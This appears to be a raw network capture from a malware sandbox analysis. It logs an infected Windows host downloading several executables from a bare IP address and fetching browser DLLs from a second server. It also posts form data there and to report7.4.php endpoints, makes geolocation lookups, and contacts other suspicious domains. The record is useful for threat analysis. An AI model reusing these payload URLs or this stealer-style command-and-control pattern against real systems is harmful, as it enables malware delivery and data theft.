                                                                Date: Mon, 28 Jun 2021 16:04:30 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Mon, 28 Jun 2021 15:37:33 GMT
                                                                ETag: "afa00-5c5d544a08d86"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 719360
                                                                Content-Type: application/x-msdos-program
                                                              • flag-unknown
                                                                GET
                                                                http://136.144.41.133/WW/file1.exe
                                                                Remote address:
                                                                136.144.41.133:80
                                                                Request
                                                                GET /WW/file1.exe HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                Host: 136.144.41.133
                                                                Cache-Control: no-cache
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:04:33 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Sun, 27 Jun 2021 07:24:03 GMT
                                                                ETag: "b0c00-5c5ba41def8db"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 723968
                                                                Content-Type: application/x-msdos-program
                                                              • flag-unknown
                                                                HEAD
                                                                http://136.144.41.133/WW/file2.exe
                                                                Remote address:
                                                                136.144.41.133:80
                                                                Request
                                                                HEAD /WW/file2.exe HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                Host: 136.144.41.133
                                                                Content-Length: 0
                                                                Cache-Control: no-cache
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:04:29 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Mon, 28 Jun 2021 15:37:33 GMT
                                                                ETag: "afa00-5c5d544a08d86"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 719360
                                                                Content-Type: application/x-msdos-program
                                                              • flag-unknown
                                                                HEAD
                                                                http://136.144.41.133/WW/file8.exe
                                                                Remote address:
                                                                136.144.41.133:80
                                                                Request
                                                                HEAD /WW/file8.exe HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                Host: 136.144.41.133
                                                                Content-Length: 0
                                                                Cache-Control: no-cache
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:04:30 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Sun, 27 Jun 2021 18:16:16 GMT
                                                                ETag: "1c6b18-5c5c35e61788d"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 1862424
                                                                Content-Type: application/x-msdos-program
                                                              • flag-unknown
                                                                GET
                                                                http://136.144.41.133/WW/file7.exe
                                                                Remote address:
                                                                136.144.41.133:80
                                                                Request
                                                                GET /WW/file7.exe HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                Host: 136.144.41.133
                                                                Cache-Control: no-cache
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:04:30 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Mon, 28 Jun 2021 15:18:16 GMT
                                                                ETag: "122bd0-5c5d4ffa2612d"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 1190864
                                                                Content-Type: application/x-msdos-program
                                                              • flag-unknown
                                                                GET
                                                                http://136.144.41.133/WW/file8.exe
                                                                Remote address:
                                                                136.144.41.133:80
                                                                Request
                                                                GET /WW/file8.exe HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                Host: 136.144.41.133
                                                                Cache-Control: no-cache
                                                              • flag-unknown
                                                                DNS
                                                                www.quickfastfuriousloaded.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                www.quickfastfuriousloaded.com
                                                                IN A
                                                                Response
                                                                www.quickfastfuriousloaded.com
                                                                IN A
                                                                89.221.213.3
                                                              • flag-unknown
                                                                DNS
                                                                pcfixmy-download-13.xyz
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                pcfixmy-download-13.xyz
                                                                IN A
                                                                Response
                                                                pcfixmy-download-13.xyz
                                                                IN A
                                                                104.21.46.30
                                                                pcfixmy-download-13.xyz
                                                                IN A
                                                                172.67.222.237
                                                              • flag-unknown
                                                                DNS
                                                                d.dirdgame.live
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                d.dirdgame.live
                                                                IN A
                                                                Response
                                                                d.dirdgame.live
                                                                IN A
                                                                172.67.186.79
                                                                d.dirdgame.live
                                                                IN A
                                                                104.21.59.252
                                                              • flag-unknown
                                                                GET
                                                                http://136.144.41.133/WW/file8.exe
                                                                Remote address:
                                                                136.144.41.133:80
                                                                Request
                                                                GET /WW/file8.exe HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
                                                                Host: 136.144.41.133
                                                                Cache-Control: no-cache
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:04:39 GMT
                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                Last-Modified: Sun, 27 Jun 2021 18:16:16 GMT
                                                                ETag: "1c6b18-5c5c35e61788d"
                                                                Accept-Ranges: bytes
                                                                Content-Length: 1862424
                                                                Content-Type: application/x-msdos-program
                                                              • flag-unknown
                                                                DNS
                                                                iphonemoney.xyz
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                iphonemoney.xyz
                                                                IN A
                                                                Response
                                                                iphonemoney.xyz
                                                                IN A
                                                                104.21.51.159
                                                                iphonemoney.xyz
                                                                IN A
                                                                172.67.182.129
                                                              • flag-unknown
                                                                POST
                                                                http://157.90.127.76/706
                                                                Remote address:
                                                                157.90.127.76:80
                                                                Request
                                                                POST /706 HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                Content-Length: 25
                                                                Host: 157.90.127.76
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Mon, 28 Jun 2021 16:04:41 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Vary: Accept-Encoding
                                                                Content-Encoding: gzip
                                                              • flag-unknown
                                                                GET
                                                                http://157.90.127.76/freebl3.dll
                                                                Remote address:
                                                                157.90.127.76:80
                                                                Request
                                                                GET /freebl3.dll HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Host: 157.90.127.76
                                                                Connection: Keep-Alive
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Mon, 28 Jun 2021 16:04:46 GMT
                                                                Content-Type: application/x-msdos-program
                                                                Content-Length: 334288
                                                                Connection: keep-alive
                                                                Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                ETag: "519d0-57aa1f0b0df80"
                                                                Expires: Tue, 29 Jun 2021 16:04:46 GMT
                                                                Cache-Control: max-age=86400
                                                                X-Cache-Status: EXPIRED
                                                                X-Cache-Status: HIT
                                                                Accept-Ranges: bytes
                                                              • flag-unknown
                                                                GET
                                                                http://157.90.127.76/mozglue.dll
                                                                Remote address:
                                                                157.90.127.76:80
                                                                Request
                                                                GET /mozglue.dll HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Host: 157.90.127.76
                                                                Connection: Keep-Alive
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Mon, 28 Jun 2021 16:04:49 GMT
                                                                Content-Type: application/x-msdos-program
                                                                Content-Length: 137168
                                                                Connection: keep-alive
                                                                Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                ETag: "217d0-57aa1f0b0df80"
                                                                Expires: Tue, 29 Jun 2021 16:04:49 GMT
                                                                Cache-Control: max-age=86400
                                                                X-Cache-Status: EXPIRED
                                                                X-Cache-Status: HIT
                                                                Accept-Ranges: bytes
                                                              • flag-unknown
                                                                GET
                                                                http://157.90.127.76/msvcp140.dll
                                                                Remote address:
                                                                157.90.127.76:80
                                                                Request
                                                                GET /msvcp140.dll HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Host: 157.90.127.76
                                                                Connection: Keep-Alive
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Mon, 28 Jun 2021 16:04:49 GMT
                                                                Content-Type: application/x-msdos-program
                                                                Content-Length: 440120
                                                                Connection: keep-alive
                                                                Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                ETag: "6b738-57aa1f0b0df80"
                                                                Expires: Tue, 29 Jun 2021 16:04:49 GMT
                                                                Cache-Control: max-age=86400
                                                                X-Cache-Status: EXPIRED
                                                                X-Cache-Status: HIT
                                                                Accept-Ranges: bytes
                                                              • flag-unknown
                                                                GET
                                                                http://157.90.127.76/nss3.dll
                                                                Remote address:
                                                                157.90.127.76:80
                                                                Request
                                                                GET /nss3.dll HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Host: 157.90.127.76
                                                                Connection: Keep-Alive
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Mon, 28 Jun 2021 16:04:49 GMT
                                                                Content-Type: application/x-msdos-program
                                                                Content-Length: 1246160
                                                                Connection: keep-alive
                                                                Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                ETag: "1303d0-57aa1f0b0df80"
                                                                Expires: Tue, 29 Jun 2021 16:04:49 GMT
                                                                Cache-Control: max-age=86400
                                                                X-Cache-Status: HIT
                                                                X-Cache-Status: HIT
                                                                Accept-Ranges: bytes
                                                              • flag-unknown
                                                                GET
                                                                http://157.90.127.76/softokn3.dll
                                                                Remote address:
                                                                157.90.127.76:80
                                                                Request
                                                                GET /softokn3.dll HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Host: 157.90.127.76
                                                                Connection: Keep-Alive
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Mon, 28 Jun 2021 16:04:49 GMT
                                                                Content-Type: application/x-msdos-program
                                                                Content-Length: 144848
                                                                Connection: keep-alive
                                                                Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                ETag: "235d0-57aa1f0b0df80"
                                                                Expires: Tue, 29 Jun 2021 16:04:49 GMT
                                                                Cache-Control: max-age=86400
                                                                X-Cache-Status: EXPIRED
                                                                X-Cache-Status: HIT
                                                                Accept-Ranges: bytes
                                                              • flag-unknown
                                                                GET
                                                                http://157.90.127.76/vcruntime140.dll
                                                                Remote address:
                                                                157.90.127.76:80
                                                                Request
                                                                GET /vcruntime140.dll HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Host: 157.90.127.76
                                                                Connection: Keep-Alive
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Mon, 28 Jun 2021 16:04:49 GMT
                                                                Content-Type: application/x-msdos-program
                                                                Content-Length: 83784
                                                                Connection: keep-alive
                                                                Last-Modified: Wed, 14 Nov 2018 15:53:50 GMT
                                                                ETag: "14748-57aa1f0b0df80"
                                                                Expires: Tue, 29 Jun 2021 16:04:49 GMT
                                                                Cache-Control: max-age=86400
                                                                X-Cache-Status: EXPIRED
                                                                X-Cache-Status: HIT
                                                                Accept-Ranges: bytes
                                                              • flag-unknown
                                                                POST
                                                                http://157.90.127.76/
                                                                Remote address:
                                                                157.90.127.76:80
                                                                Request
                                                                POST / HTTP/1.1
                                                                Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                                                Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                                                Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                                                Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                                                Content-Type: multipart/form-data; boundary=1BEF0A57BE110FD467A
                                                                Content-Length: 3571
                                                                Host: 157.90.127.76
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Mon, 28 Jun 2021 16:04:56 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Content-Encoding: gzip
                                                              • flag-unknown
                                                                GET
                                                                http://ip-api.com/json/
                                                                Remote address:
                                                                208.95.112.1:80
                                                                Request
                                                                GET /json/ HTTP/1.1
                                                                Connection: Keep-Alive
                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                viewport-width: 1920
                                                                Host: ip-api.com
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:04:49 GMT
                                                                Content-Type: application/json; charset=utf-8
                                                                Content-Length: 323
                                                                Access-Control-Allow-Origin: *
                                                                X-Ttl: 22
                                                                X-Rl: 37
                                                              • flag-unknown
                                                                DNS
                                                                flamkravmaga.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                flamkravmaga.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                DNS
                                                                flamkravmaga.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                flamkravmaga.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                DNS
                                                                flamkravmaga.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                flamkravmaga.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                DNS
                                                                flamkravmaga.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                flamkravmaga.com
                                                                IN A
                                                                Response
                                                              • flag-unknown
                                                                GET
                                                                http://ip-api.com/json/?fields=8198
                                                                Remote address:
                                                                208.95.112.1:80
                                                                Request
                                                                GET /json/?fields=8198 HTTP/1.1
                                                                Accept: */*
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                Host: ip-api.com
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:05:11 GMT
                                                                Content-Type: application/json; charset=utf-8
                                                                Content-Length: 57
                                                                Access-Control-Allow-Origin: *
                                                                X-Ttl: 0
                                                                X-Rl: 36
                                                              • flag-unknown
                                                                GET
                                                                http://ip-api.com/json/?fields=8198
                                                                Remote address:
                                                                208.95.112.1:80
                                                                Request
                                                                GET /json/?fields=8198 HTTP/1.1
                                                                Accept: */*
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                Host: ip-api.com
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:05:12 GMT
                                                                Content-Type: application/json; charset=utf-8
                                                                Content-Length: 57
                                                                Access-Control-Allow-Origin: *
                                                                X-Ttl: 60
                                                                X-Rl: 44
                                                              • flag-unknown
                                                                GET
                                                                http://ip-api.com/json/?fields=8198
                                                                Remote address:
                                                                208.95.112.1:80
                                                                Request
                                                                GET /json/?fields=8198 HTTP/1.1
                                                                Accept: */*
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                Host: ip-api.com
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:05:13 GMT
                                                                Content-Type: application/json; charset=utf-8
                                                                Content-Length: 57
                                                                Access-Control-Allow-Origin: *
                                                                X-Ttl: 58
                                                                X-Rl: 43
                                                              • flag-unknown
                                                                GET
                                                                http://ip-api.com/json/?fields=8198
                                                                Remote address:
                                                                208.95.112.1:80
                                                                Request
                                                                GET /json/?fields=8198 HTTP/1.1
                                                                Accept: */*
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                Host: ip-api.com
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:05:14 GMT
                                                                Content-Type: application/json; charset=utf-8
                                                                Content-Length: 57
                                                                Access-Control-Allow-Origin: *
                                                                X-Ttl: 57
                                                                X-Rl: 42
                                                              • flag-unknown
                                                                DNS
                                                                iw.gamegame.info
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                iw.gamegame.info
                                                                IN A
                                                                Response
                                                                iw.gamegame.info
                                                                IN A
                                                                172.67.200.215
                                                                iw.gamegame.info
                                                                IN A
                                                                104.21.21.221
                                                              • flag-unknown
                                                                POST
                                                                http://iw.gamegame.info/report7.4.php
                                                                Remote address:
                                                                172.67.200.215:80
                                                                Request
                                                                POST /report7.4.php HTTP/1.1
                                                                Accept: */*
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                Host: iw.gamegame.info
                                                                Content-Length: 278
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:05:12 GMT
                                                                Content-Type: application/json; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Vary: Accept-Encoding
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0af4f72a9600000c81b01d6000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=p9HoavhuyBK9Iw7hhue3R%2F8scnMgIZH6ev3v%2FCtcOKr7oODyVRM4Cuk85uadWyesStk56m1EFN6%2BQHyPAkO8UovXwlpJM5SYDLdt0eQLH2A6obWT6PZEgzcMXDqcAg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 666827bdb8c60c81-AMS
                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                              • flag-unknown
                                                                POST
                                                                http://iw.gamegame.info/report7.4.php
                                                                Remote address:
                                                                172.67.200.215:80
                                                                Request
                                                                POST /report7.4.php HTTP/1.1
                                                                Accept: */*
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                Host: iw.gamegame.info
                                                                Content-Length: 278
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:05:14 GMT
                                                                Content-Type: application/json; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Vary: Accept-Encoding
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0af4f732a300000c81c235b000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=T%2FPuE%2B7UuT3dbk5seymum4AKvExEoFUzLXAX%2B026mLlKDSWky%2B02%2FfMwKh9VHMWNfScVvGtselmTdzu5Xg%2F2o1Blb27fP1fjo1HA6RkzHrQQPYfo5CioY%2BTGmcqr5Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 666827ca9b7d0c81-AMS
                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                              • flag-unknown
                                                                POST
                                                                http://iw.gamegame.info/report7.4.php
                                                                Remote address:
                                                                172.67.200.215:80
                                                                Request
                                                                POST /report7.4.php HTTP/1.1
                                                                Accept: */*
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                Host: iw.gamegame.info
                                                                Content-Length: 250
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:05:15 GMT
                                                                Content-Type: application/json; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Vary: Accept-Encoding
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0af4f734d900000c815cb38000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=skBM6%2FVoS43b5V69e23V9ywZR3wrkEacCWe4m2J7SERNk8CiEuYMU%2FC0Oc7nDO4k8VFwTRqbVex6V8PWE3nPzyz5GEoRCkUcJOZec6j03squJ0dwBAz8L8IOwLwCOA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 666827ce2fee0c81-AMS
                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                              • flag-unknown
                                                                DNS
                                                                www.facebook.com
                                                                arnatic_4.exe
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                www.facebook.com
                                                                IN A
                                                                Response
                                                                www.facebook.com
                                                                IN CNAME
                                                                star-mini.c10r.facebook.com
                                                                star-mini.c10r.facebook.com
                                                                IN A
                                                                31.13.83.36
                                                              • flag-unknown
                                                                DNS
                                                                ol.gamegame.info
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                ol.gamegame.info
                                                                IN A
                                                                Response
                                                                ol.gamegame.info
                                                                IN A
                                                                104.21.21.221
                                                                ol.gamegame.info
                                                                IN A
                                                                172.67.200.215
                                                              • flag-unknown
                                                                POST
                                                                http://ol.gamegame.info/report7.4.php
                                                                Remote address:
                                                                104.21.21.221:80
                                                                Request
                                                                POST /report7.4.php HTTP/1.1
                                                                Accept: */*
                                                                Content-Type: application/x-www-form-urlencoded
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
                                                                Host: ol.gamegame.info
                                                                Content-Length: 278
                                                                Connection: Keep-Alive
                                                                Cache-Control: no-cache
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Date: Mon, 28 Jun 2021 16:05:13 GMT
                                                                Content-Type: application/json; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                CF-Cache-Status: DYNAMIC
                                                                cf-request-id: 0af4f72cce00004c5575b3c000000001
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=SSIERkboMhyy8lrFS5NZzWu9l6U6Ap7JhTejZrHF2aWvA2OxjJyiplP4GKlVsGhVzh0jwY99AqefaX1ryF%2BNUvVdDmP3pvdOd5ZLMUZ2%2BOha5BUn6TqA17CINJUuSw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 666827c14e6e4c55-AMS
                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                              • flag-unknown
                                                                DNS
                                                                zedaumalev.xyz
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                zedaumalev.xyz
                                                                IN A
                                                                Response
                                                                zedaumalev.xyz
                                                                IN A
                                                                77.246.145.4
                                                              • flag-unknown
                                                                POST
                                                                http://zedaumalev.xyz/
                                                                Remote address:
                                                                77.246.145.4:80
                                                                Request
                                                                POST / HTTP/1.1
                                                                Content-Type: text/xml; charset=utf-8
                                                                SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                                                Host: zedaumalev.xyz
                                                                Content-Length: 137
                                                                Expect: 100-continue
                                                                Accept-Encoding: gzip, deflate
                                                                Connection: Keep-Alive
                                                                Response
                                                                HTTP/1.1 200 OK
                                                                Server: nginx
                                                                Date: Mon, 28 Jun 2021 16:05:17 GMT
                                                                Content-Type: text/xml; charset=utf-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Keep-Alive: timeout=3
                                                                Vary: Accept-Encoding
                                                                Content-Encoding: gzip
                                                              • flag-unknown
                                                                DNS
                                                                api.ip.sb
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                api.ip.sb
                                                                IN A
                                                                Response
                                                                api.ip.sb
                                                                IN CNAME
                                                                api.ip.sb.cdn.cloudflare.net
                                                                api.ip.sb.cdn.cloudflare.net
                                                                IN A
                                                                172.67.75.172
                                                                api.ip.sb.cdn.cloudflare.net
                                                                IN A
                                                                104.26.13.31
                                                                api.ip.sb.cdn.cloudflare.net
                                                                IN A
                                                                104.26.12.31
                                                              • flag-unknown
                                                                DNS
                                                                uyg5wye.2ihsfa.com
                                                                Remote address:
                                                                8.8.8.8:53
                                                                Request
                                                                uyg5wye.2ihsfa.com
                                                                IN A
                                                                Response
                                                                uyg5wye.2ihsfa.com
                                                                IN A
                                                                88.218.92.148
                                                              • flag-unknown
                                                                GET
                                                                http://uyg5wye.2ihsfa.com/api/fbtime
                                                                Remote address:
                                                                88.218.92.148:80
                                                                Request
                                                                GET /api/fbtime HTTP/1.1
                                                                Connection: Keep-Alive
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                Host: uyg5wye.2ihsfa.com
                                                                Response
